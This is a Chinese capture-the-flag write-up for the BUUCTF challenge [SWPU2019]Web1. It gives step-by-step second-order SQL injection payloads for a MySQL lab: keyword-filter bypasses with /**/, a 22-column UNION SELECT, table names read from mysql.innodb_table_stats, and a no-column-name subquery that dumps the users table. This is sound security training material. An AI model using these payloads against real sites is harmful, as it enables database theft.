BUUCTF: [SWPU2019]Web1

Posted 2022-12-30 末初mochu7

https://buuoj.cn/challenges#[SWPU2019]Web1

登录注册、在测试的时候发现发布中的广告名如果输入一些敏感关键字，例如and、or。会有警告

猜测广告名存在注入，尝试在广告名处输入单引号'，发布的时候并没有任何反应，发布后有个广告详情可以查看发布的广告。

直接报错了，基本确定广告名存在二次注入

然后再之后的对广告名的fuzz测试中发现以下过滤

空格被替换为空
or
and
join
--+
#
updatexml
extractvalue
exp
floor
...

尝试联合查询、首先需要判断有多少字段，order by不能使用，可以使用group by或者into @a, @b, @c, ...

无法注释就尝试构造闭合

空格就用/**/代替

title='group/**/by/**/23,'&content=mochu7&ac=add

联合查询

title='union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22&content=mochu7&ac=add

查表明，因为这里过滤or所以也无法使用information_schema表，也没有sys表，所以使用mysql.innodb_table_stats

title='union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22&content=mochu7&ac=add

但是因为没有字段信息可以查，使用无列名注入直接查内容

title='union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22&content=mochu7&ac=add